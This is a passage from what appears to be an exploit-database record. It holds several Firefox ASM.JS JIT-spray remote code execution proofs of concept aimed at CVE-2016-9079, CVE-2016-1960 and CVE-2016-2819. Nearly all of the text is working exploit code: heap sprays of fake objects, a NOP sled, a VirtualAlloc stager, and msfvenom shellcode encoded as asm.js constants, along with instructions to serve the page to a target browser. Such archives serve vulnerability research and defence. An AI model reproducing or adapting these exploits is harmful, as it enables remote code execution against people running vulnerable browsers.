0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n val = (val + 0xa8909090)|0;\r\n /* 3 byte VirtualAlloc RWX stager */\r\n val = (val + 0xa890db31)|0;\r\n val = (val + 0xa89030b3)|0;\r\n val = (val + 0xa81b8b64)|0;\r\n val = (val + 0xa80c5b8b)|0;\r\n val = (val + 0xa81c5b8b)|0;\r\n val = (val + 0xa8b9006a)|0;\r\n val = (val + 0xa8904c4c)|0;\r\n val = (val + 0xa8902eb1)|0;\r\n val = (val + 0xa85144b5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa8903233)|0;\r\n val = (val + 0xa89045b1)|0;\r\n val = (val + 0xa8514cb5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa8904e52)|0;\r\n val = (val + 0xa8904bb1)|0;\r\n val = (val + 0xa85145b5)|0;\r\n val = (val + 0xa8590e6a)|0;\r\n val = (val + 0xa84fe789)|0;\r\n val = (val + 0xa8086b8b)|0;\r\n val = (val + 0xa820738b)|0;\r\n val = (val + 0xa8471b8b)|0;\r\n val = (val + 0xa82ae349)|0;\r\n val = (val + 0xa890c031)|0;\r\n val = (val + 0xa890ad66)|0;\r\n val = (val + 0xa89c613c)|0;\r\n val = (val + 0xa8077c9d)|0;\r\n val = (val + 0xa890202c)|0;\r\n val = (val + 0xa89c073a)|0;\r\n val = (val + 0xa8d7749d)|0;\r\n val = (val + 0xa890bdeb)|0;\r\n val = (val + 0xa8b9006a)|0;\r\n val = (val + 0xa890636f)|0;\r\n val = (val + 0xa8906cb1)|0;\r\n val = (val + 0xa8516cb5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa890416c)|0;\r\n val = (val + 0xa89075b1)|0;\r\n val = (val + 0xa85161b5)|0;\r\n val = (val + 0xa8b99090)|0;\r\n val = (val + 0xa8907472)|0;\r\n val = (val + 0xa89056b1)|0;\r\n val = (val + 0xa85169b5)|0;\r\n val = (val + 0xa890eb89)|0;\r\n val = (val + 0xa83cc583)|0;\r\n val = (val + 0xa8006d8b)|0;\r\n val = (val + 0xa890dd01)|0;\r\n val = (val + 0xa878c583)|0;\r\n val = (val + 0xa8006d8b)|0;\r\n val = (val + 0xa890dd01)|0;\r\n val = (val + 0xa820458b)|0;\r\n val = (val + 0xa890d801)|0;\r\n val = (val + 0xa890d231)|0;\r\n val = (val + 0xa890e789)|0;\r\n val = (val + 0xa8590d6a)|0;\r\n val = (val + 0xa810348b)|0;\r\n val = (val + 0xa890de01)|0;\r\n val = (val + 0xa890a6f3)|0;\r\n val = (val + 0xa8900de3)|0;\r\n val = (val + 0xa804c283)|0;\r\n val = (val + 0xa890dbeb)|0;\r\n val = (val + 0xa8247d8b)|0;\r\n val = (val + 0xa890df01)|0;\r\n val = (val + 0xa890ead1)|0;\r\n val = (val + 0xa890d701)|0;\r\n val = (val + 0xa890d231)|0;\r\n val = (val + 0xa8178b66)|0;\r\n val = (val + 0xa81c7d8b)|0;\r\n val = (val + 0xa890df01)|0;\r\n val = (val + 0xa802e2c1)|0;\r\n val = (val + 0xa890d701)|0;\r\n val = (val + 0xa8903f8b)|0;\r\n val = (val + 0xa890df01)|0;\r\n val = (val + 0xa890406a)|0;\r\n val = (val + 0xa890c031)|0;\r\n val = (val + 0xa85030b4)|0;\r\n val = (val + 0xa85010b4)|0;\r\n val = (val + 0xa890006a)|0;\r\n val = (val + 0xa890d7ff)|0;\r\n val = (val + 0xa890c931)|0;\r\n val = (val + 0xa89000b5)|0;\r\n val = (val + 0xa890c3b1)|0;\r\n val = (val + 0xa890ebd9)|0;\r\n val = (val + 0xa82434d9)|0;\r\n val = (val + 0xa890e689)|0;\r\n val = (val + 0xa80cc683)|0;\r\n val = (val + 0xa890368b)|0;\r\n val = (val + 0xa85fc683)|0;\r\n val = (val + 0xa890c789)|0;\r\n val = (val + 0xa81e8b66)|0;\r\n val = (val + 0xa81f8966)|0;\r\n val = (val + 0xa802c683)|0;\r\n val = (val + 0xa802c783)|0;\r\n val = (val + 0xa8901e8a)|0;\r\n val = (val + 0xa8901f88)|0;\r\n val = (val + 0xa803c683)|0;\r\n val = (val + 0xa801c783)|0;\r\n val = (val + 0xa803e983)|0;\r\n val = (val + 0xa89008e3)|0;\r\n val = (val + 0xa890cceb)|0;\r\n val = (val + 0xa890e0ff)|0;\r\n val = (val + 0xa824248d)|0;\r\n /* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */\r\n val = (val + 0xa882e8fc)|0;\r\n val = (val + 0xa8000000)|0;\r\n val = (val + 0xa8e58960)|0;\r\n val = (val + 0xa864c031)|0;\r\n val = (val + 0xa830508b)|0;\r\n val = (val + 0xa80c528b)|0;\r\n val = (val + 0xa814528b)|0;\r\n val = (val + 0xa828728b)|0;\r\n val = (val + 0xa84ab70f)|0;\r\n val = (val + 0xa8ff3126)|0;\r\n val = (val + 0xa8613cac)|0;\r\n val = (val + 0xa82c027c)|0;\r\n val = (val + 0xa8cfc120)|0;\r\n val = (val + 0xa8c7010d)|0;\r\n val = (val + 0xa852f2e2)|0;\r\n val = (val + 0xa8528b57)|0;\r\n val = (val + 0xa84a8b10)|0;\r\n val = (val + 0xa84c8b3c)|0;\r\n val = (val + 0xa8e37811)|0;\r\n val = (val + 0xa8d10148)|0;\r\n val = (val + 0xa8598b51)|0;\r\n val = (val + 0xa8d30120)|0;\r\n val = (val + 0xa818498b)|0;\r\n val = (val + 0xa8493ae3)|0;\r\n val = (val + 0xa88b348b)|0;\r\n val = (val + 0xa831d601)|0;\r\n val = (val + 0xa8c1acff)|0;\r\n val = (val + 0xa8010dcf)|0;\r\n val = (val + 0xa8e038c7)|0;\r\n val = (val + 0xa803f675)|0;\r\n val = (val + 0xa83bf87d)|0;\r\n val = (val + 0xa875247d)|0;\r\n val = (val + 0xa88b58e4)|0;\r\n val = (val + 0xa8012458)|0;\r\n val = (val + 0xa88b66d3)|0;\r\n val = (val + 0xa88b4b0c)|0;\r\n val = (val + 0xa8011c58)|0;\r\n val = (val + 0xa8048bd3)|0;\r\n val = (val + 0xa8d0018b)|0;\r\n val = (val + 0xa8244489)|0;\r\n val = (val + 0xa85b5b24)|0;\r\n val = (val + 0xa85a5961)|0;\r\n val = (val + 0xa8e0ff51)|0;\r\n val = (val + 0xa85a5f5f)|0;\r\n val = (val + 0xa8eb128b)|0;\r\n val = (val + 0xa86a5d8d)|0;\r\n val = (val + 0xa8858d01)|0;\r\n val = (val + 0xa80000b2)|0;\r\n val = (val + 0xa8685000)|0;\r\n val = (val + 0xa86f8b31)|0;\r\n val = (val + 0xa8d5ff87)|0;\r\n val = (val + 0xa80efebb)|0;\r\n val = (val + 0xa868ea32)|0;\r\n val = (val + 0xa8bd95a6)|0;\r\n val = (val + 0xa8d5ff9d)|0;\r\n val = (val + 0xa87c063c)|0;\r\n val = (val + 0xa8fb800a)|0;\r\n val = (val + 0xa80575e0)|0;\r\n val = (val + 0xa81347bb)|0;\r\n val = (val + 0xa86a6f72)|0;\r\n val = (val + 0xa8ff5300)|0;\r\n val = (val + 0xa86d63d5)|0;\r\n val = (val + 0xa8652e64)|0;\r\n val = (val + 0xa8006578)|0;\r\n val = (val + 0xa8909090)|0;\r\n\r\n return val|0;\r\n }\r\n return payload_code \r\n}\r\n</script>\r\n\r\n<script>\r\nfunction spray_asm_js_modules(){\r\n sprayed = []\r\n for (var i=0; i<= 0x1800; i++){\r\n sprayed[i] = asm_js_module()\r\n }\r\n}\r\n\r\n/* heap spray inspired by skylined */\r\nfunction heap_spray_fake_objects(){\r\n var heap = []\r\n var current_address = 0x08000000\r\n var block_size = 0x1000000\r\n while(current_address < object_target_address){\r\n var heap_block = new Uint32Array(block_size/4 - 0x100)\r\n for (var offset = 0; offset < block_size; offset += 0x100000){\r\n\r\n /* fake object target = ecx + 0x88 and fake vtable*/\r\n heap_block[offset/4 + 0x00/4] = object_target_address\r\n /* self + 4 */\r\n heap_block[offset/4 + 0x14/4] = object_target_address\r\n /* the path to EIP */\r\n heap_block[offset/4 + 0x18/4] = 4\r\n heap_block[offset/4 + 0xac/4] = 1\r\n /* fake virtual function --> JIT target */\r\n heap_block[offset/4 + 0x138/4] = jit_payload_target \r\n }\r\n heap.push(heap_block)\r\n current_address += block_size\r\n }\r\n return heap\r\n}\r\n\r\n/* address of fake object */\r\nobject_target_address = 0x30300000\r\n\r\n/* address of our jitted shellcode */\r\njit_payload_target = 0x1c1c0054\r\n\r\n/* ASM.JS JIT Spray */\r\nspray_asm_js_modules()\r\n\r\n/* Spray fake objects */\r\nheap = heap_spray_fake_objects()\r\n\r\n/* -----> */\r\n/* bug trigger ripped from bugzilla report */\r\nvar worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage(\"one\");postMessage(\"two\");};');\r\nworker.postMessage(\"zero\");\r\nvar svgns = 'http://www.w3.org/2000/svg';\r\nvar heap80 = new Array(0x1000);\r\nvar heap100 = new Array(0x4000);\r\nvar block80 = new ArrayBuffer(0x80);\r\nvar block100 = new ArrayBuffer(0x100);\r\nvar sprayBase = undefined;\r\nvar arrBase = undefined;\r\nvar animateX = undefined;\r\nvar containerA = undefined;\r\nvar offset = 0x88 // Firefox 50.0.1\r\n\r\nvar exploit = function(){\r\n var u32 = new Uint32Array(block80)\r\n\r\n u32[0x4] = arrBase - offset;\r\n u32[0xa] = arrBase - offset;\r\n u32[0x10] = arrBase - offset;\r\n\r\n for(i = heap100.length/2; i < heap100.length; i++)\r\n {\r\n heap100[i] = block100.slice(0)\r\n }\r\n\r\n for(i = 0; i < heap80.length/2; i++)\r\n {\r\n heap80[i] = block80.slice(0)\r\n }\r\n\r\n animateX.setAttribute('begin', '59s')\r\n animateX.setAttribute('begin', '58s')\r\n\r\n for(i = heap80.length/2; i < heap80.length; i++)\r\n {\r\n heap80[i] = block80.slice(0)\r\n }\r\n\r\n for(i = heap100.length/2; i < heap100.length; i++)\r\n {\r\n heap100[i] = block100.slice(0)\r\n }\r\n\r\n animateX.setAttribute('begin', '10s')\r\n animateX.setAttribute('begin', '9s')\r\n containerA.pauseAnimations();\r\n}\r\n\r\nworker.onmessage = function(e) {arrBase=object_target_address; exploit()}\r\n//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}\r\n\r\nvar trigger = function(){\r\n containerA = document.createElementNS(svgns, 'svg')\r\n var containerB = document.createElementNS(svgns, 'svg');\r\n animateX = document.createElementNS(svgns, 'animate')\r\n var animateA = document.createElementNS(svgns, 'animate')\r\n var animateB = document.createElementNS(svgns, 'animate')\r\n var animateC = document.createElementNS(svgns, 'animate')\r\n var idA = \"ia\";\r\n var idC = \"ic\";\r\n animateA.setAttribute('id', idA);\r\n animateA.setAttribute('end', '50s');\r\n animateB.setAttribute('begin', '60s');\r\n animateB.setAttribute('end', idC + '.end');\r\n animateC.setAttribute('id', idC);\r\n animateC.setAttribute('end', idA + '.end');\r\n containerA.appendChild(animateX)\r\n containerA.appendChild(animateA)\r\n containerA.appendChild(animateB)\r\n containerB.appendChild(animateC)\r\n document.body.appendChild(containerA);\r\n document.body.appendChild(containerB);\r\n}\r\n\r\nwindow.onload = trigger;\r\nsetInterval(\"window.location.reload()\", 3000)\r\n/* <----- */\r\n\r\n</script>\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42327/"}, {"lastseen": "2018-05-24T14:08:00", "bulletinFamily": "exploit", "description": "Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution. CVE-2016-1960,CVE-2017-5375. Remote exploit for Windows platform", "modified": "2018-03-16T00:00:00", "published": "2018-03-16T00:00:00", "id": "EDB-ID:44294", "href": "https://www.exploit-db.com/exploits/44294/", "type": "exploitdb", "title": "Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution", "sourceData": "<!DOCTYPE HTML>\r\n\r\n<!--\r\n\r\n FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)\r\n *PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)\r\n ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018\r\n\r\n Tested on:\r\n Firefox 44.0.2 32-bit - Windows 10 1709\r\n https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe\r\n\r\n Howto:\r\n 1) serve PoC over network and open it in Firefox 44.0.2 32-bit\r\n 2) A successfull exploit attempt should pop calc.exe\r\n\r\n Mozilla Bug Report:\r\n https://bugzilla.mozilla.org/show_bug.cgi?id=1246014\r\n\r\n\r\n Writeup: \r\n https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/\r\n\r\n\r\n - For research purposes only -\r\n \r\n (C) Rh0\r\n\r\n Mar. 13, 2018\r\n\r\n Notes:\r\n *) very similar to CVE-2016-2819, but still different:\r\n *) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1\r\n because in 46.0.1 it is already fixed.\r\n *) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it\r\n was fixed in Firefox > 46.0.1\r\n\r\n-->\r\n\r\n<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>\r\n<head>\r\n<meta charset=UTF-8 />\r\n<script>\r\n\"use strict\"\r\n\r\nvar Exploit = function(){\r\n this.asmjs = new Asmjs()\r\n this.heap = new Heap()\r\n}\r\n\r\nExploit.prototype.go = function(){\r\n /* target address of fake node object */\r\n var node_target_addr = 0x20200000 \r\n\r\n /* target address of asm.js float pool payload*/\r\n var target_eip = 0x3c3c1dc8\r\n\r\n /* spray fake Node objects */\r\n this.heap.spray(node_target_addr, target_eip)\r\n\r\n /* spray asm.js float constant pools */\r\n this.asmjs.spray_float_payload(0x1800)\r\n\r\n /* go! */\r\n this.trigger_vuln(node_target_addr)\r\n};\r\n\r\n\r\nExploit.prototype.trigger_vuln = function(node_ptr){\r\n document.body.innerHTML = '<table><svg><div id=\"AAAA\">'\r\n this.heap.gc()\r\n var a = new Array() \r\n for (var i=0; i < 0x11000; i++){\r\n /* array element (Node object ptr) control with integer underflow */\r\n a[i] = new Uint32Array(0x100/4)\r\n for (var j=0; j<0x100/4; j++)\r\n a[i][j] = node_ptr \r\n }\r\n\r\n /* original crashing testcase\r\n document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';\r\n */\r\n\r\n /* easier to exploit codepath */\r\n document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';\r\n\r\n window.location.reload()\r\n};\r\n\r\n\r\nvar Asmjs = function(){};\r\n\r\nAsmjs.prototype.asm_js_module = function(stdlib, ffi){\r\n \"use asm\"\r\n var foo = ffi.foo\r\n function payload(){\r\n var val = 0.0\r\n /* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/\r\n val = +foo(\r\n // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py\r\n -1.587865768352248e-263,\r\n -8.692422460804815e-255,\r\n 7.529882109376901e-114,\r\n 2.0120602207293977e-16,\r\n 3.7204662687249914e-242,\r\n 4.351158092040946e+89,\r\n 2.284741716118451e+270,\r\n 7.620699014501263e-153,\r\n 5.996021286047645e+44,\r\n -5.981935902612295e-92,\r\n 6.23540918304361e+259,\r\n 1.9227873281657598e+256,\r\n 2.0672493951546363e+187,\r\n -6.971032919585734e+91,\r\n 5.651413300798281e-134,\r\n -1.9040061366251406e+305,\r\n -1.2687640718807038e-241,\r\n 9.697849844423e-310,\r\n -2.0571400761625145e+306,\r\n -1.1777948610587587e-123,\r\n 2.708909852013898e+289,\r\n 3.591750823735296e+37,\r\n -1.7960516725035723e+106,\r\n 6.326776523166028e+180\r\n )\r\n return +val;\r\n }\r\n return payload\r\n};\r\n\r\nAsmjs.prototype.spray_float_payload = function(regions){\r\n this.modules = new Array(regions).fill(null).map(\r\n region => this.asm_js_module(window, {foo: () => 0})\r\n )\r\n};\r\n\r\nvar Heap = function(target_addr, eip){\r\n this.node_heap = []\r\n};\r\n\r\n\r\nHeap.prototype.spray = function(node_target_addr, target_eip){\r\n var junk = 0x13371337\r\n var current_address = 0x08000000\r\n var block_size = 0x1000000\r\n while(current_address < node_target_addr){\r\n var fake_objects = new Uint32Array(block_size/4 - 0x100)\r\n for (var offset = 0; offset < block_size; offset += 0x100000){\r\n /* target Node object needed to control EIP */\r\n fake_objects[offset/4 + 0x00/4] = 0x29 \r\n fake_objects[offset/4 + 0x0c/4] = 3\r\n fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18\r\n fake_objects[offset/4 + 0x18/4] = 1\r\n fake_objects[offset/4 + 0x1c/4] = junk\r\n fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24\r\n fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28\r\n fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c\r\n fake_objects[offset/4 + 0x2c/4] = target_eip \r\n }\r\n this.node_heap.push(fake_objects)\r\n current_address += block_size\r\n }\r\n};\r\n\r\nHeap.prototype.gc = function(){\r\n for (var i=0; i<=10; i++)\r\n var x = new ArrayBuffer(0x1000000)\r\n};\r\n\r\n</script>\r\n<head>\r\n<body onload='exploit = new Exploit(); exploit.go()' />", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44294/"}], "packetstorm": [{"lastseen": "2018-03-23T01:30:23", "bulletinFamily": "exploit", "description": "", "modified": "2018-03-16T00:00:00", "published": "2018-03-16T00:00:00", "href": "https://packetstormsecurity.com/files/146818/Firefox-46.0.1-ASM.JS-JIT-Spray-Remote-Code-Execution.html", "id": "PACKETSTORM:146818", "type": "packetstorm", "title": "Firefox 46.0.1 ASM.JS JIT-Spray Remote Code Execution", "sourceData": "`<!DOCTYPE HTML> \n \n<!-- \n \nFULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375) \n*PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819) \nASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018 \n \nTested on: \nFirefox 46.0.1 32-bit - Windows 10 1709 \nhttps://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe \n \nHowto: \n1) serve PoC over network and open it in Firefox 46.0.1 32-bit \n2) A successfull exploit attempt should pop calc.exe \n \nMozilla Bug Report: \nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1270381 \n \n \nWriteup: \nhttps://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/ \n \n \n- For research purposes only - \n \n(C) Rh0 \n \nMar. 13, 2018 \n \n--> \n \n<title>CVE-2016-2819 and ASM.JS JIT-Spray</title> \n<head> \n<meta charset=UTF-8 /> \n<script> \n\"use strict\" \n \nvar Exploit = function(){ \nthis.asmjs = new Asmjs() \nthis.heap = new Heap() \n} \n \nExploit.prototype.go = function(){ \n/* target address of fake node object */ \nvar node_target_addr = 0x5a500000 \n \n/* target address of asm.js float pool payload*/ \nvar target_eip = 0x20200b58 \n \n/* spray asm.js float constant pools */ \nthis.asmjs.spray_float_payload(0x1000) \n \n/* spray fake Node objects */ \nthis.heap.spray(node_target_addr, target_eip) \n \n/* go! */ \nthis.trigger_vuln(node_target_addr) \n}; \n \n \nExploit.prototype.trigger_vuln = function(node_ptr){ \ndocument.body.innerHTML = '<table><svg><div id=\"BBBB\">' \nthis.heap.gc() \nvar a = new Array() \nfor (var i=0; i < 0x10100; i++){ \n/* array element (Node object ptr) control with integer underflow */ \na[i] = new Uint32Array(0x100/4) \nfor (var j=0; j<0x100/4; j++) \na[i][j] = node_ptr \n} \n \n/* original crashing testcase \ndocument.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}</style>' \n*/ \n \n/* easier to exploit codepath */ \ndocument.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}<DD>' \n \nwindow.location.reload() \n}; \n \n \nvar Asmjs = function(){}; \n \nAsmjs.prototype.asm_js_module = function(stdlib, ffi){ \n\"use asm\" \nvar foo = ffi.foo \nfunction payload(){ \nvar val = 0.0 \n/* Fx 46.0.1 float constant pool of size 0xc0 is at 0xXXXX0b58*/ \nval = +foo( \n// $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py \n-1.587865768352248e-263, \n-8.692422460804815e-255, \n7.529882109376901e-114, \n2.0120602207293977e-16, \n3.7204662687249914e-242, \n4.351158092040946e+89, \n2.284741716118451e+270, \n7.620699014501263e-153, \n5.996021286047645e+44, \n-5.981935902612295e-92, \n6.23540918304361e+259, \n1.9227873281657598e+256, \n2.0672493951546363e+187, \n-6.971032919585734e+91, \n5.651413300798281e-134, \n-1.9040061366251406e+305, \n-1.2687640718807038e-241, \n9.697849844423e-310, \n-2.0571400761625145e+306, \n-1.1777948610587587e-123, \n2.708909852013898e+289, \n3.591750823735296e+37, \n-1.7960516725035723e+106, \n6.326776523166028e+180 \n) \nreturn +val; \n} \nreturn payload \n}; \n \nAsmjs.prototype.spray_float_payload = function(regions){ \nthis.modules = new Array(regions).fill(null).map( \nregion => this.asm_js_module(window, {foo: () => 0}) \n) \n}; \n \nvar Heap = function(target_addr, eip){ \nthis.node_heap = [] \n}; \n \n \nHeap.prototype.spray = function(node_target_addr, target_eip){ \nvar junk = 0x13371337 \nvar current_address = 0x20000000 \nvar block_size = 0x1000000 \nwhile(current_address < node_target_addr){ \nvar fake_objects = new Uint32Array(block_size/4 - 0x100) \nfor (var offset = 0; offset < block_size; offset += 0x100000){ \n/* target Node object needed to control EIP */ \nfake_objects[offset/4 + 0x00/4] = 0x29 \nfake_objects[offset/4 + 0x0c/4] = 3 \nfake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18 \nfake_objects[offset/4 + 0x18/4] = 1 \nfake_objects[offset/4 + 0x1c/4] = junk \nfake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24 \nfake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28 \nfake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c \nfake_objects[offset/4 + 0x2c/4] = target_eip \n} \nthis.node_heap.push(fake_objects) \ncurrent_address += block_size \n} \n}; \n \nHeap.prototype.gc = function(){ \nfor (var i=0; i<=10; i++) \nvar x = new ArrayBuffer(0x1000000) \n}; \n \n</script> \n<head> \n<body onload='exploit = new Exploit(); exploit.go()' /> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146818/firefox4601asmjsjit-exec.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-15T22:47:02", "bulletinFamily": "exploit", "description": "", "modified": "2017-07-14T00:00:00", "published": "2017-07-14T00:00:00", "href": "https://packetstormsecurity.com/files/143373/Firefox-50.0.1-ASM.JS-JIT-Spray-Remote-Code-Execution.html", "id": "PACKETSTORM:143373", "title": "Firefox 50.0.1 ASM.JS JIT-Spray Remote Code Execution", "type": "packetstorm", "sourceData": "`<!DOCTYPE HTML> \n \n<!-- \n \nFULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375) \nPoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day) \n \nTested on: \n \nRelease 50.0.1 32-bit - Windows 8.1 / Windows 10 \nhttps://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe \n \nHowto: \n \n1) serve PoC over network and open it in Firefox 50.0.1 32-bit \n2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe \n \nA successfull exploit attempt should pop cmd.exe \n \nWriteup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/ \n \n(C) Rh0 \n \nJul. 13, 2017 \n \n--> \n \n<script async> \nfunction asm_js_module(){ \n\"use asm\"; \n/* huge jitted nop sled */ \nfunction payload_code(){ \nvar val = 0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \nval = (val + 0xa8909090)|0; \n/* 3 byte VirtualAlloc RWX stager */ \nval = (val + 0xa890db31)|0; \nval = (val + 0xa89030b3)|0; \nval = (val + 0xa81b8b64)|0; \nval = (val + 0xa80c5b8b)|0; \nval = (val + 0xa81c5b8b)|0; \nval = (val + 0xa8b9006a)|0; \nval = (val + 0xa8904c4c)|0; \nval = (val + 0xa8902eb1)|0; \nval = (val + 0xa85144b5)|0; \nval = (val + 0xa8b99090)|0; \nval = (val + 0xa8903233)|0; \nval = (val + 0xa89045b1)|0; \nval = (val + 0xa8514cb5)|0; \nval = (val + 0xa8b99090)|0; \nval = (val + 0xa8904e52)|0; \nval = (val + 0xa8904bb1)|0; \nval = (val + 0xa85145b5)|0; \nval = (val + 0xa8590e6a)|0; \nval = (val + 0xa84fe789)|0; \nval = (val + 0xa8086b8b)|0; \nval = (val + 0xa820738b)|0; \nval = (val + 0xa8471b8b)|0; \nval = (val + 0xa82ae349)|0; \nval = (val + 0xa890c031)|0; \nval = (val + 0xa890ad66)|0; \nval = (val + 0xa89c613c)|0; \nval = (val + 0xa8077c9d)|0; \nval = (val + 0xa890202c)|0; \nval = (val + 0xa89c073a)|0; \nval = (val + 0xa8d7749d)|0; \nval = (val + 0xa890bdeb)|0; \nval = (val + 0xa8b9006a)|0; \nval = (val + 0xa890636f)|0; \nval = (val + 0xa8906cb1)|0; \nval = (val + 0xa8516cb5)|0; \nval = (val + 0xa8b99090)|0; \nval = (val + 0xa890416c)|0; \nval = (val + 0xa89075b1)|0; \nval = (val + 0xa85161b5)|0; \nval = (val + 0xa8b99090)|0; \nval = (val + 0xa8907472)|0; \nval = (val + 0xa89056b1)|0; \nval = (val + 0xa85169b5)|0; \nval = (val + 0xa890eb89)|0; \nval = (val + 0xa83cc583)|0; \nval = (val + 0xa8006d8b)|0; \nval = (val + 0xa890dd01)|0; \nval = (val + 0xa878c583)|0; \nval = (val + 0xa8006d8b)|0; \nval = (val + 0xa890dd01)|0; \nval = (val + 0xa820458b)|0; \nval = (val + 0xa890d801)|0; \nval = (val + 0xa890d231)|0; \nval = (val + 0xa890e789)|0; \nval = (val + 0xa8590d6a)|0; \nval = (val + 0xa810348b)|0; \nval = (val + 0xa890de01)|0; \nval = (val + 0xa890a6f3)|0; \nval = (val + 0xa8900de3)|0; \nval = (val + 0xa804c283)|0; \nval = (val + 0xa890dbeb)|0; \nval = (val + 0xa8247d8b)|0; \nval = (val + 0xa890df01)|0; \nval = (val + 0xa890ead1)|0; \nval = (val + 0xa890d701)|0; \nval = (val + 0xa890d231)|0; \nval = (val + 0xa8178b66)|0; \nval = (val + 0xa81c7d8b)|0; \nval = (val 